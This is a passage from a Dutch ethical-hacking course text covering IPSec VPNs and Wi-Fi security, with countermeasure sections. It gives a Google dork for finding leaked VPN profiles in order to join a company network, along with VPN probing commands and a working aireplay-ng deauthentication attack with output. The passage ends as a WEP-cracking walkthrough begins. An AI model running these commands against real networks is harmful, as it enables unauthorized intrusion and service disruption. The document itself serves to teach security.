5.7.3 Encryptie (SSH, IPSec) Een sniffer zal netwerkverkeer afluisteren, maar als dat netwerkverkeer geëncrypteerd is kan de persoon die dit netwerkverkeer heeft laten afluisteren er niet veel mee aanvangen. Daarom is het noodzakelijk om gevoelige gegevens te encrypteren. En je moet zeker ook nagaan of je gegevens geëncrypteerd blijven tot ze hun bestemming bereikt hebben. Het zou zonde zijn dat je gegevens
76
© Nathan Boone
gedecrypteerd ergens op het netwerk te vinden zijn, als jij ze toch geëncrypteerd heeft. Dit kan gebeuren als je een proxy gebruikt die geen HTTPS ondersteunt.
Een protocol dat je kan gebruiken om vanop afstand in te loggen op een systeem, en dat hierbij encryptie gebruikt, is Secure Shell (SSH).
IPSec en IKE zijn Internet standaarden die kunnen zorgen voor de authenticatie en voor het encrypteren van netwerkverkeer.
6 Honeypot server Een Honeypot server is geen server om ergens binnen te breken, maar je kan deze server
gebruiken om je te verdedigen tegen aanvallen. Zo een soort server zal openstaan voor aanvallen, er zal een besturingssysteem draaien, waarvan geweten is dat er kan bij binnengebroken worden. In ditzelfde toestel bevinden zich wachtwoorden en gebruikersnamen. De hacker denkt dan dat zijn hack succesvol is en zal geen argwaan hebben.
De verdediger heeft deze server per opzet geplaatst. Terwijl de hacker bezig is met aanvallen, heeft deze Honeypot server veel gegevens over de hacker en over zijn werkwijze bijgehouden. Op deze manier kunnen de hackers tegengehouden en gevat worden.
Bron: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
77
© Nathan Boone
Pagina opzettelijk blanco gelaten
78
© Nathan Boone
Stap 5: Virtual Private Network 1 Inleiding Er zijn zeer veel bedrijven die toelaten dat hun medewerkers van op afstand werken op en naast de systemen die in de onderneming staan. Eén van de voorwaarden hiervan is dat de gegevens veilig bij de onderneming geraken. Om hiervoor te zorgen, gebruiken veel ondernemingen een Virtual Private Network.
2 Virtual Private Network (VPN) Een Virtual Private Network (VPN) is een privaat netwerk. Dit wordt gebruikt als er een medewerker van thuis wilt werken op de toestellen die op het netwerk in het bedrijf staan. Je kan dit ook doen zonder VPN, maar dan zijn je gegevens niet beveiligd. Een VPN maakt een tunnel van bij een gebruiker naar een bedrijf. Deze tunnel zal gebruikt worden om gegevens veilig van bij een medewerker tot bij een bedrijf te brengen.
Als een bedrijf twee vestigingen heeft, kan je ook een VPN opstellen tussen beide instellingen zodat ze virtueel in hetzelfde netwerk zitten.
Er zijn vier grote voordelen om voor een VPN te kiezen:
• Confidentialiteit: dit wil zeggen dat de pakketten geëncrypteerd zijn. Enkel de mensen/toestellen die je vertrouwt, zullen je pakket goed kunnen lezen omdat zij een “key” hebben om het pakket de decrypteren. Als iemand je verbinding zou afluisteren, zouden ze niets kunnen doen met de gegevens omdat ze geëncrypteerd zijn.
• Data integriteit: als je een bestand doorstuurt zou het kunnen dat iemand onderweg je pakket aangepast heeft waardoor de data veranderd zijn. Als je met gevoelige gegevens werkt, is het noodzakelijk dit tegen te gaan.
o Wanneer de VPN opgesteld wordt zal de hash doorgestuurd worden zodat zowel de ontvanger als de verstuurder de hash hebben. Een hash is een algoritme dat de VPN zal uitvoeren op de pakketten. Dit zal gebeuren, zowel bij de verstuurder als bij de ontvanger. De verstuurder zal bij het versturen van een pakket de hash uitvoeren, hij zal hierbij een code verkrijgen. De ontvanger zal diezelfde hash uitvoeren op de pakketten die hij ontvangen heeft. Als de code die de ontvanger heeft bekomen dezelfde code is als de code die in het pakket aanwezig is, dan weet de ontvanger dat de integriteit van de data behouden is.
o De manieren die je kan gebruiken om te een hash toe te passen zijn: Message Digest 5 (MD5) Secure Hash Algorithm 1 (SHA-1) Secure Hash Algoritm 2 (SHA-2)
• Authenticatie: bij een VPN is het de bedoeling dat niet iedereen een VPN kan opstellen naar je bedrijf, maar enkel de mensen die hiervoor bevoegd zijn. De verschillende methodes die gebruikt kunnen worden in een VPN zijn:
o pre-shared keys o public en pricate key pairs o gebruiker authenticatie
• Antireplay: als een aanvaller je VPN verkeer afluistert en veinst dat hij de persoon is waarmee al een VPN lopende is, zal dit niet lukken. Een hacker zal dit proberen te doen door
79
© Nathan Boone
het pakket dat hij afgeluisterd heeft, terug te sturen naar het toestel waarvan de VPN lopende is. Dit zal hij niet kunnen doen, omdat elk pakket dat gebruikt is geweest in de VPN sessie niet meer toegelaten is in het netwerk.
In het kort:
Doel Methode Confidentialiteit Encryptie Data integriteit Hashing Authenticatie Pre-shared keys, public/private key pair Antireplay Geïntegreerd in IPSec, serienummers toevoegen aan de pakketten en geen
pakket met hetzelfde serienummer toelaten.
Bron: CCNA Security 640-554 Official Cert Guide
2.1 De tot stand komst van een IPSec VPN Een IPSec VPN is een type VPN dat laag 3 van het OSI-model gebruikt, de netwerk-laag. Een IPSec VPN zal twee fases gebruiken om tot een beveiligde verbinding te komen. Deze fases zijn:
• Internet Key Exchange Fase 1 (IKE Fase 1) o Main mode o Agressive mode
• Internet Key Exchange Fase 2 (IKE Fase 2)
2.1.1 Internet Key Exchange Fase 1 (IKE Fase 1) De IKE Fase 1 tunnel is een tunnel die zal gebruikt worden om het management voor de VPN te beveiligen. Er moet over 5 zaken genegotieerd worden tussen de initiator en de responder:
• Het Hash Algoritme: Message Digest 5 Algoritme (MD5) of Secure Hash Algoritme (SHA) • Het Encryptie Algoritme: Digital Encryption Standard (DES), Triple DES (3DES) of Advanced
Encryption Standard (AES) • De Diffie-Hellman group: dit is het uitwisselen van een geheime encryptiesleutel om daarna
communicatie tussen de initiator en de responder te versleutelen. • De Authenticatiemethode: dit wordt gebruikt om de identiteit van de initiator en de
responder te controleren. Dit kan gebeuren met Pre Shared keys of een Public-Private key pair (RSA)
• Lifetime: hier wordt besproken hoe lang de VPN open blijft staan, als er geen verkeer over komt. Het veiligste is om dit korter te maken dan één dag. Als dit niet overeenkomt tussen de initiator of de responder is dit niet erg. De tunnel zal toch werken met de kortst ingestelde tijd.
Als je van elk van deze zaken beslist hebt welke je zal gebruiken, heb je de keuze tussen twee modes om deze tunnel op te zetten. Je kan kiezen voor “Main mode” ofwel “Agressive mode”.
80
© Nathan Boone
2.1.1.1 Main mode Deze mode wordt het meeste gebruikt om een VPN op te stellen omdat deze het veiligste is. Deze main mode bestaat uit drie verschillende stappen.
• eerst beslissen de initiator en responder welke algoritmen en hashes gebruikt worden om de communicatie in de IKE tunnel te beveiligen.
• ten tweede zal er een Diffie-Hellman public key uitgewisseld worden voor het genereren van gedeelde geheime keys. Er zullen ook nonces uitgewisseld worden, om de identiteit van de deelnemers te bevestigen.
• ten derde zal de identiteit van beide gecontroleerd worden door naar het geëncrypteerd IP-adres te kijken.
2.1.1.2 Agressive Mode Deze methode is minder veilig, omdat er minder controle is bij het opstarten van deze tunnel. Deze methode is wel sneller, want er worden minder pakketten verstuurd. Een nadeel aan de agressive mode is dat er gegevens uitgewisseld zijn voor de tunnel opgestart is. Die gegevens zijn dus niet geëncrypteerd en kunnen afgeluisterd worden. Deze agressive mode bestaat uit 2 stappen:
• eerst beslissen de initiator en responder welke algoritmen, hashes, Diffie-Hellman public key en welke nonces gebruikt worden om de communicatie in de IKE tunnel te beveiligen
• ten tweede zal de initiator de identiteit van de responder controleren. Als dit in orde is, wordt de tunnel opgezet
2.1.2 Internet Key Exchange Fase 2 (IKE Fase 2) In de IKE fase 2 zal er een tunnel opgezet worden om de eigenlijke data van de gebruikers te encrypteren. Dit zal gebeuren met de hulp van de IKE fase 1. IKE fase 2 heeft één mode, deze mode is de “Quick mode”
2.1.2.1 Quick mode De “Quick mode” is de mode die zal gebruikt worden om de eigenlijke VPN tunnel op te starten waardoor de gegevens van de gebruiker zullen lopen. Deze mode bestaat uit 3 stappen:
• eerst beslissen de initiator en responder welke algoritmen en hashes gebruikt worden om de communicatie in de IKE tunnel te beveiligen. Dit zal gebeuren in de al gemaakte tunnel door de IKE fase 1 waardoor alles geëncrypteerd is
• ten tweede zullen de overeengekomen algoritmen en hashes in werking treden in de volledig beveiligde tunnel, omdat ze al beveiligd zijn door de IKE fase 1
Als alles overeengekomen is, dan zal een IPSec Security Association ontstaan. Dit is een verzameling van encryptiemethodes en keys die gebruikt zullen worden om je gegevens over te brengen. De afbeelding hieronder geeft een duidelijke blik op de IPSec tunnel.
81
© Nathan Boone
Tabel 2-1 IPSec tunnel
Bronnen:
https://sc1.checkpoint.com/documents/R77/CP_R77_VPN_AdminGuide/13847.htm https://supportforums.cisco.com/docs/DOC-8125, http://en.wikipedia.org/wiki/IPsec#Security_association, http://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol, http://cisco-vpn.org.ua/1587051044/ch08lev1sec1.html, http://nl.wikipedia.org/wiki/Diffie-Hellman-sleuteluitwisselingsprotocol
2.2 Site-to-site VPN Een site-to-site VPN is een VPN dat je kan gebruiken om een tunnel te maken tussen twee vestigingen van een bedrijf. Het netwerk zal er dan virtueel uitzien als één netwerk, waardoor de twee vestigingen naadloos met elkaar kunnen communiceren.
2.3 Client-to-site VPN Bij een client-to-site VPN zal je een VPN opstellen van één enkele gebruiker naar een bedrijfsnetwerk. Dit is een goede keuze als je medewerker wil werken via een openbaar onbeveiligd draadloos netwerk, bijvoorbeeld op luchthavens en andere. In dit geval kan hij gebruikmaken van software zoals een Cisco VPN client die de IPSec tunnel zal opstellen voor de gebruiker. Hij kan in dit geval ook gebruik maken van een SSL VPN.
2.4 Google hacking voor VPN Zoals al bewezen in “Stap 1 – Footprinting” is het gebruik van Google gemakkelijk, om snel toestellen te vinden waar gevoelige informatie opstaan. Om profiel gegevens te vinden die gebruikt worden bij een VPN kan je naar bestanden zoeken met het bestandstype pcf. Als je bijvoorbeeld wilt zoeken naar de VPN die gebruikt wordt door elec0ne, kan je de volgende zoekopdracht intypen: filetype:pcf site:elec0ne.com. Als je hiermee een bestand vindt, staan daar geëncrypteerde gegevens in. Als je dit pcf bestand gedownload hebt, kan je dit importeren in een Cisco VPN Client waarna je connectie kan maken met de VPN. Hierdoor zit je dus op het netwerk en kan je andere aanvallen uitvoeren op het netwerk.
82
© Nathan Boone
2.4.1 Google hacking voor VPN Tegenmaatregel Normaalgezien zouden de pcf bestanden niet zomaar mogen te vinden zijn op het internet.
Bij sommige bedrijven is dit wel het geval, het gaat dan om mensen die een VPN willen opstarten maar eigenlijk niet goed weten waarmee ze bezig zijn.
2.5 Probing IPSec VPN Servers Om na te gaan of er een VPN server aanwezig is op het netwerk, kan je zoeken naar UDP poort 500 in het netwerk. Je kan dit doen met de tool Nmap. Het kan zijn dat je hierdoor geen resultaat bekomt. Dit komt omdat, als je een VPN opstelt, je ervoor kan kiezen dat deze onzichtbaar is als er een scan uitgevoerd wordt op poort 500.
Commando:
nmap -sU -p 500 192.168.1.1 Resultaat :
Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-16 11:08 CET Nmap scan report for 192.168.1.1 Host is up (0.00062s latency). PORT STATE SERVICE 500/udp open isakmp MAC Address: 44:03:A7:AA:02:E0 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds Er kan voor gezorgd worden dat Nmap niet het gewenste resultaat bekomt en daarom kan je nog een gedetailleerdere scan uitvoeren.
Om een gedetailleerde scan uit te voeren kan je de volgende tool downloaden: ike-scan van NTA-Monitor (www.nta-monitor.com/tools/ike-scan).
Met deze tool zal je ook veel meer te weten komen over de VPN dan alleen maar of er een VPN aanwezig is.
Commando:
ike-scan 192.168.1.1 Resultaat:
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 192.168.1.1 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=0e803d2b90649737) Ending ike-scan 1.9: 1 hosts scanned in 0.014 seconds (72.26 hosts/sec). 0 returned handshake; 1 returned notify
2.5.1 Probing IPSec VPN Servers Tegenmaatregel Je kan weinig doen om tegen te gaan dat er ontdekt wordt dat er een VPN aanwezig. Je kan
bij een site-to-site VPN wel enkel aan de IP-adressen die je vertrouwt de mogelijkheid geven om te connecteren met de VPN. Maar als er gewerkt wordt met een site-to-site VPN is het niet mogelijk om dit te vermijden, omdat men meestal vanaf een andere plaats, dus met een ander IP-adres, naar de VPN server zal gaan.
83
© Nathan Boone
2.6 Attacking IKE Aggressive Mode Bij de IKE aggressive mode is er een manier om binnen te breken in een tunnel. En dit omdat de gegevens bij de IKE fase 1 afgeluisterd kunnen worden. Eerst en vooral moet je te weten komen of de VPN die je wilt aanvallen een aggressive mode aanvaart.
De tool die hiervoor gemaakt is: IKEProbe van Cipherica Labs (www.ernw.de/download/ikeprobe.zip)
Als je weet dat de VPN die je wilt aanvallen een aggressive mode ondersteunt, kan je een perl script laten werken die dan zal proberen binnen te breken in de VPN.
2.6.1 Attacking IKE Aggressive Mode Tegenmaatregel Het beste wat je kan doen om dit soort aanvallen tegen te houden is het gebruik van een
aggressive mode niet toe te laten op je VPN.
84
© Nathan Boone
Stap 6: Wireless Hacking 1 Inleiding In een bedrijfsomgeving wordt een draadloos netwerk meer om meer gebruikt, omdat het gemakkelijk is als er gasten zijn die hun eigen toestellen meenemen. Dit geldt niet alleen voor gasten, in vele bedrijven wordt er gedaan aan BYOD, dit is de term voor “Bring Your Own Device”. Als hun eigen toestel dan een tablet is, dan is er geen andere keuze dan te kiezen voor een draadloze oplossing voor het netwerk.
Een draadloos netwerk is altijd het punt in het netwerk dat het moeilijkste te beveiligen is. Als je draadloos netwerk tot buiten de fysieke grenzen van je onderneming gaat, heb je zelfs al niet meer de sociale controle of moet de aanvaller zelfs geen toegang krijgen tot je gebouw, maar kan hij van buiten je gebouw proberen toegang te krijgen tot je draadloos netwerk.
Er bestaan verschillende manieren om je draadloos netwerk te beschermen, maar bij vele van deze manieren is het mogelijk om de beveiligingscodes te kraken en zo een weg naar binnen te vinden.
2 Achtergrond Draadloze communicatie bestaat al lang. In de eerste wereldoorlog is deze veel gebruikt geweest. Om veiligheidsredenen beperkten ze het gebruik van draadloze communicatie, en mocht het alleen gebruikt worden voor militaire doeleinden.
Het is pas in het jaar 1997 dat het draadloze Local Area Network (LAN) ontstaan is. Deze standaard is uitgebracht door “The Institute of Electrical and Electronics Engineers” (IEEE). De standaard kreeg de naam 802.11 of Wi-Fi. Elke keer als er een nieuwe versie van deze standaard uitgebracht wordt, wordt dit nummer aangepast.
Bron: http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htmFrequenties
3 Channels en frequenties De 802.11 standaard werkt met verschillende frequenties en channels. De frequenties die gebruikt worden voor een Wi-Fi netwerk zijn 2.4 GHz en 5.8 GHz. Het hangt af van de versie van de standaard op welke frequentie het Wi-Fi netwerk zal werken. Het hangt van de frequentie af welke channels mogelijk zijn en welke snelheid er mogelijk is binnen het draadloos netwerk.
Hieronder bevindt zich een tabel met de mogelijke Wi-Fi versies met hun frequentie en mogelijke bandbreedte. Er zijn veel factoren die de bandbreedte kunnen beïnvloeden. Hoe hoger de frequentie, hoe minder ver het draadloos netwerk zal reiken en hoe hoger de bandbreedte is.
Wi-Fi versie Jaar van productie Frequentie Bandbreedte 802.11 1997 2.4 GHz 2 Mbps 802.11b 1999 2.4 GHz 11 Mbps 802.11a 1999 5 GHz 54 Mbps 802.11g 2003 2.4 GHz 54 Mbps 802.11n 2007 2.4 GHz, 5 GHz 100 Mbps 802.11ac 2014 5 GHz 500 Mbps
Tabel 3-1 Wi-Fi versie en Frequentie
85
© Nathan Boone
Bij een draadloos netwerk is het mogelijk dat verschillende channels overlappen waardoor deze elkaar verstoren. Hierdoor kan het dat je Wi-Fi soms wegvalt of dat je bandbreedte heel hard afneemt. Dit is een probleem bij appartementsgebouwen waar veel draadloze netwerken aanwezig zijn. Hieronder bevindt zich een overzicht van de verschillende mogelijke channels bij een 2.4 GHz draadloos netwerk.
Tabel 3-2 Channels met overlapping
In een 5 GHz netwerk bestaat er geen overlapping. De channels die hier kunnen gebruikt worden zijn van channel 36 tot channel 140. In een 5Ghz netwerk is er geen overlapping mogelijk.
Bron: https://discussions.apple.com/thread/2632171, http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm
4 Verschillende types Wi-Fi Er zijn verschillende manieren om een draadloos netwerk te maken, ad-hoc en infrastructure.
4.1 Ad-hoc Bij een ad-hoc netwerk zal er gebruik gemaakt worden van een peer-to-peer manier, dus zonder gebruik te maken van een acces point.
4.2 Infrastructure Infrastructure netwerken hebben een acces point nodig om connectie mee te maken, de acces point is dan aangesloten aan het bedraad netwerk. Deze soort draadloze netwerken zijn de meest voorkomende, we zullen deze netwerken dus uitgebreid bespreken.
Als je wil connectie maken met een draadloos netwerk, moet je de Service Set Identifier (SSID) te weten komen. Dit kan je via twee manieren doen:
• Je kan luisteren naar beacons, in die beacons is de SSID in vermeld. Deze beacons worden uitgestuurd door de access point.
• Je kan ook een probe request sturen zonder specifieke SSID waardoor al de SSID’s zullen reageren met een probe response.
86
© Nathan Boone
Als je de SSID weet zal je een probe request uitsturen (dit is een broadcast), hij zal dit op elke channel apart doen. Dit zal hij doen totdat hij het draadloos netwerk gevonden heeft dat hij op voorhand geconfigureerd heeft. Dit komt hij te weten als hij een probe response terugkrijgt van de acces point. Hierna zal de client aan authentication request sturen en, als hij een authentication response terugkrijgt van de acces point is, hij verbonden met het netwerk.
We zijn ervan uitgegaan dat er geen vorm van beveiliging aanwezig is in het netwerk.
5 Manieren om een draadloos netwerk te beveiligen Er zijn verschillende manieren om een draadloos netwerk te beveiligen. Dit gaat vanaf enkel vertrouwde toestellen binnen te laten in het netwerk, tot de encryptie die op het netwerk plaatsvindt.
5.1 Basis methodes De volgende methodes zijn basis methodes om een draadloos netwerk te beveiligen. De volgende methodes zijn gemakkelijk te omzeilen maar zullen leken weerhouden om connectie te maken met je draadloos netwerk.
5.1.1 MAC filtering Een access point heeft de mogelijkheid om aan MAC filtering te doen. Dit wil zeggen dat de access point tijdens de authenticatie fase zal kijken naar het MAC-adres en als deze niet in een voor geconfigureerde lijst voorkomt, dan zal hij geen toegang krijgen tot het draadloos netwerk.
5.1.2 Verborgen draadloze netwerken Het is mogelijk om je access point zo te configureren dat als hij een beacon uitzendt hier de SSID niet in zit. Dit maakt het moeilijker voor een aanvaller om te verbinding te maken met het netwerk, omdat hij de SSID nodig heeft om verbinding te maken met het netwerk.
5.1.3 Antwoorden op probe requests Clients kunnen probe requests uitsturen zonder een SSID, waardoor ze van elk draadloos netwerk dat zich in de buurt bevindt antwoord krijgt. Om ervoor te zorgen dat je draadloos netwerk hier niet bijzit kan je je acces point zo configureren dat hij al de probe requests zonder SSID zal negeren. In een bedrijfsomgeving is het aangeraden al de toestellen zo te configureren dat ze de SSID al weten. Als je gasten krijgt kan je hier de SSID aan vertellen. Hiermee zorg je ervoor dat mensen waarvan je niet wil dat ze de SSID te weten komen er moeilijker aan geraken.
87
© Nathan Boone
5.2 Authenticatie Er is een groot verschil tussen authenticatie en encryptie. Bij authenticatie zal je toegang krijgen tot het netwerk, er zal dan ook een sessie key aangemaakt worden, die gebruikt zal worden bij het encryptie proces. De encryptie en authenticatie zullen beide gebeuren nog voordat het toestel dat verbinding wil maken met het netwerk een IP-adres krijgt. Voor de authenticatie wordt er Wi-Fi Protected Access (WPA) gebruikt. Er zijn twee soorten WPA: WPA Pre-Shared Key en WPA Enterprise.
• WPA Pre-Shared Key (WPA-PSK): een key zal gebruikt worden bij de connectie met het draadloos netwerk. Deze key is gekend bij de access point en bij al de clients in het draadloos netwerk. Het is dezelfde key die zal gebruikt worden bij al de clients. Deze WPA key wordt in een cryptografische functie gebruikt om encryptie keys te maken. Hiermee zal de sessie beveiligd worden.
• WPA Enterprise: de access point zal de authenticatie laten gebeuren door een RADIUS server. Hierdoor kunnen vele soorten authenticatie gebruikt worden, waardoor je de manier van authenticatie kan aanpassen aan de situatie. Je kan het extensible authentication protocol (EAP) gebruiken die vele authenticatie mechanismen ondersteunt zoals EAP-TTLE, PEAP en EAP-FAST.
Bij beide WPA-PSK en WPA Enterprise zal er een “four-way” handshake plaatsvinden om twee encryptie keys aan te maken:
• een pairwise transient key (PTK) die zal gebruikt worden voor de unicast communicatie • een group temporal key (GTK) die zal gebruikt worden voor mulitcast en broadcast
communicatie
5.2.1 WPA four-way handshake Bij WPA zal er een four-way handshake plaatsvinden omdat de Pairwise Master Key (PMK) het best niet al te veel bekendgemaakt wordt. Er zullen dus andere keys gemaakt worden, een pairwise transient key (PTK) die zal gebruikt worden voor de unicast communicatie en een group temporal key (GTK) die zal gebruikt worden voor mulitcast en broadcast communicatie.
De afbeelding hieronder geeft meer informatie over hoe deze four-way handshake tot stand komt. De STA is de client station.
Tabel 5-1 Four-way-handshake
88
© Nathan Boone
De verschillende stappen zijn:
• De access point (AP) zendt een nonce naar de STA (ANonce). De client heeft nu al de gegevens om een PTK aan te maken. Dit zal hij doen door de gegevens die hij gekregen heeft, te combineren met de PMK die hij bekomen heeft bij de authenticatie.
• De STA zal dan zijn eigen nonce (SNonce) doorsturen met een MIC naar de AP. Een MIC is een Message Authentication and Integrity Code. Deze zal dus de authenticatie en de integriteit nakijken.
• De Accespoint zal dan op zijn beurt de PTK maken. • De Accespoint zal dan de GTK naar de STA sturen met daarbij een sequentienummer en een
MIC. Dit sequentienummer zal de AP gebruiken bij het volgende multicast of broadcastpakket om zo basis replay detectie te doen.
• De STA zal dan als laatste een confirmatie sturen naar de AP.
bron: http://en.wikipedia.org/wiki/IEEE_802.11i-2004
5.3 Encryptie Encryptie zal gebeuren op laag 2 van het OSI model waardoor de IP-adressen, MAC-adressen, probes en beacons niet geëncrypteerd worden. De data die via het draadloos netwerk naar een bedraad netwerk gaan, zal gedecrypteerd worden als het naar het bedraad netwerk gaat. Dit decrypteren heeft geen effect op het gebruik van een encryptie op een hogere laag van het OSI model, zoals HTTPS.
Er zijn drie mogelijkheden om draadloos verkeer te encrypteren:
• Wired Equivalent Privacy (WEP): WEP is de voorloper van WPA met één groot verschil, dat WEP geen authenticatie fase heeft. Bij WEP weet elke deelnemer in het netwerk de encryptiesleutel waardoor het niet veilig is. Er zijn ook manieren om een WEP key te kraken waardoor het niet veilig is en waardoor je het beter niet meer gebruikt.
• Temporal Key Integrity Protocol (TKIP): TKIP is een protocol dat ingevoerd is om WEP te vervangen, er is geen andere hardware voor nodig. Alles wat WEP ondersteunt, ondersteunt ook TKIP. Bij TKIP zal er een andere encryptie key gebruikt bij elke andere deelnemer in het netwerk. Er zal ook een integriteitcontrole gedaan worden, dit wil zeggen dat pakketten waarvan de sequentienummer niet op elkaar opvolgen niet zal toegelaten worden. Er zal bij TKIP ook een hash uitgevoerd worden per pakket. Meer informatie over hashing is te vinden in “Stap 5: Remote connectivity”.
• Advanced Encryption Standard – Counter Mode with Cipher Block Chaning Message Authentication Code Protocol (AES-CCMP): AES-CCMP is een totaal andere en veel betere manier voor encryptie. Hier zal rekenig gehouden worden met data-integriteit en confidentialiteit.
89
© Nathan Boone
6 Discovery en monitoren Om netwerk discovery te doen bestaan er tools die probe requests en probe responses zullen nakijken, om zo draadloze netwerken te vinden. Aangezien de IP-adressen niet geëncrypteerd zijn, kan dit soort tool ook nagaan van waar naar waar op het netwerk veel verkeer is. Er zijn twee soorten van discovery:
• active discovery • passive discovery
6.1 Active Discovery Bij active discovery zullen er probe request uitgestuurd worden zonder SSID en gewacht worden totdat er acces points iets terugsturen. Dit zal soms niet werken, omdat de access points zo ingesteld kunnen worden dat ze dit soort requests negeren.
6.2 Active Discovery Tegenmaatregels Omdat het bij active discovery nodig is om met probe requests te werken, kan je dit soort van
broadcast uitzetten aan de access point.
6.3 Passive Discovery Passive discovery is de soort van discovery die het meeste gebruikt wordt. Dit soort van discovery zal elk kanaal afgaan en luisteren naar de data die voorbijkomen om er zo achter het BSSID’s (mac adres van acces point) te komen. De tool zal dan de SSID identificeren als ongekend. Als er een client verbinding maakt met het netwerk moet deze de SSID meesturen. Dus als dit gebeurt zal je de SSID te weten komen. Passive discovery kan je niet nagaan, dus dit is de beste manier voor de aanvaller die niet gekend wilt zijn.
6.4 Passive Discovery Tegenmaatregels Er is niet echt iets wat je kan doen tegen passive discovery. Wat je kan doen is nagaan dat je
draadloos signaal niet buiten de fysieke afbakening van je bedrijf komt. Je kan dit doen door de sterkte van het signaal dat uit de access point komt te verminderen.
6.5 Discovery tools Er zijn zeer veel discovery tools, maar er zijn twee linux tools die zeer goed zijn:
• Kismet • airodumt-ng
Er zijn veel mensen die deze tools gebruiken om zo al de acces points in kaart te brengen, dit gebeurt op vele verschillende manieren, te voet, via boot, te fiets, te auto en zelf via drones met een ingebouwde Wi-Fi antenne en GPS antenne. De gegevens zijn terug te vinden op www.wigle.net.
90
© Nathan Boone
6.5.1 Kismet Kismet is een robuuste tool die alsmaar beter wordt met de tijd. Deze tool heeft een ingebouwde GPS functie en laat zelf interactie toe met de muis, wat niet vaak gebeurt bij Linux tools. Kismet kan je downloaden via www.kismetwireless.net.
Commando:
kismet
Resultaat:
6.5.2 Airodump-ng Airodump-ng is een tool die te vinden is bij de veelgebruikte wireless hacking toolset aircrack-ng die te vinden is via www.aircrack-ng.org. Deze suite bevat zo goed als elke draadloze hacking tool en deze suite wordt goed onderhouden. Bij deze tool moet je eerst je draadloze adapter in monitor mode brengen.
Commando:
airmon-ng start wlan0
Resultaat:
Interface Chipset Driver wlan0 Intel 1030 iwlwifi - [phy0] (monitor mode enabled on mon0)
Nu de monitor mode gestart is kan men airodump-ng starten. Met de monitor mode aan te zetten is er een nieuwe interface gemaakt, deze interface is (mon0). Nu kunnen we airodump-ng starten.
91
© Nathan Boone
Airodump-ng zal luisteren naar al de mogelijke draadloze acces points, door te hoppen tussen de mogelijke 2.4 GHz channels en al de data hierop te observeren.
Commando:
airodump-ng mon0
Resultaat:
CH 5 ][ BAT: 2 hours 50 mins ][ Elapsed: 16 s ][ 2014-01-14 11:07 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 42:D9:98:60:C3:BC -70 43 0 0 6 54e. WEP WEP testnetwerk BSSID STATION PWR Rate Lost Frames Probe
7 Denial of service attack Bij de 802.11 standaard is er eigenlijk al een ingebouwde DOS aanval. In sommige gevallen is het nodig om de client te de-authentiseren, in het geval van foute encryptie keys, overloading, enz…
7.1 De-authenticatie aanval Bij een de-authenticatie aanval zullen er de-authenticatie frames nagemaakt worden en verstuurd worden naar de clients alsof ze van de AP komen. En omgekeerd, zodat de AP denkt dat de client de verbinding wil verbreken en dat de client hetzelfde denkt van de AP.
7.1.1 airplay-ng Airplay-ng is een tool die veel functionaliteiten heeft, waaronder de mogelijkheid bestaat om een de-authenticatie aanval uit te voeren. Deze tool zal bij elke aanval 64 de-authenticatie frames uitsturen naar de AP en 64 de-authenticatie frames naar de client.
Eerst zal je de adapter op monitor mode moeten zetten en de channel kiezen.
Commando: iwconfig mon0 channel 1
Na het vorige commando kan je de aanval starten.
Commando: aireplay-ng --deauth 2 -a 42:D9:98:60:C3:BC -c CC:08:E0:20:F8:74 mon0
Resultaat:
22:09:26 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6 22:09:27 Sending 64 directed DeAuth. STMAC: [CC:08:E0:20:F8:74] [40|65 ACKs] 22:09:27 Sending 64 directed DeAuth. STMAC: [CC:08:E0:20:F8:74] [18|63 ACKs]
92
© Nathan Boone
8 Encryptie aanval Een encryptie aanval komt tot stand wanneer er een kwetsbaarheid ontdekt wordt in de methode die gebruikt wordt om te authentiseren. Bij WPA is de authenticatiemethode Tkip of AES-CCMP, dus als er bij één van deze protocollen een kwetsbaarheid ontdekt wordt dan kan je deze gebruiken om de key te kraken. WPA is een encryptiemethode waarbij de encryptiesleutels roteren in het netwerk, waardoor het moeilijker wordt om de key te kraken. Bij WEP is het simpel om een encryptieaanval te doen, omdat hier geen authenticatie-fase of key-rotatie plaatsvindt. Dus als je in een WEP-netwerk de key gekraakt hebt, dan kan je als een betrouwde gebruiker het netwerk betreden en andere mensen hun pakketten decrypteren zonder dat iemand dit zal te weten komen.
8.1 WEP Er zijn vele manieren ontdekt om een WEP encryptie methode te kraken. De twee meest gebruikte zullen besproken worden:
• Passieve aanval • ARP replay aanval
8.1.1 Achtergrond bij WEP encryptie Als je data over een draadloos netwerk stuurt dat beveiligd is door WEP, dan zal er een soort van encryptie plaatsvinden. Deze encryptie wordt gedaan door gebruik te maken van de WEP key en een Initialization Vector (IV). Deze IV is 24 bits groot, wordt random gegenereerd en wordt bijgevoegd aan het einde van een 802.11 header. De IV en de WEP key worden gebruikt om een keystream te maken. Deze keystream zal dan gebruikt worden om de pakketten te encrypteren.
Om de pakketten de decrypteren, zal de ontvangende kant de IV uit het pakket halen. Met die IV en WEP-key zal dan weer een keystream aangemaakt worden. Met deze keystream kunnen de pakketten gedecrypteerd worden.
De IV heeft maar een grootte van 24bits waardoor er dubbele IV’s op het netwerk kunnen zijn. Als er een dubbele IV gevonden wordt op het netwerk, dan wordt de geencrypteerde tekt van de twee frames vergeleken met elkaar om zo de keystream te ontdekken.
De keystream kan ook geraden worden door een groot aantal frames van een bepaald type te verzamelen. Omdat ARP pakketten niet zo verschillend zijn van elkaar en omdat ze klein zijn, zijn dit de pakketten die het meeste gebruikt zullen worden. Hoe meer frames je bijhoudt, hoe meer kans je hebt om de keystream te ontdekken.
Aan de hand van de keystream en de gecollecteerde IV’s, kan de WEP key geraden worden.
8.1.2 Passieve aanval Bij een passieve aanval zal je je 802.11 capturing tool gebruiken om zoveel mogelijk data frames te collecteren. Vroeger zou je ongeveer 1 miljoen frames nodig gehad hebben om een 104-bit WEP-key te kraken. Met de tools van tegenwoordig is dit nog maar om en bij de 60 000. De tool die we hiervoor zullen gebruiken is aurodump-ng. Om daarna de keystream en WEP-key te vinden, maken we gebruik van aircrack-ng.
93
© Nathan Boone
8.1.2.1 Airodump-ng Commando om WEP-frames bij te houden:
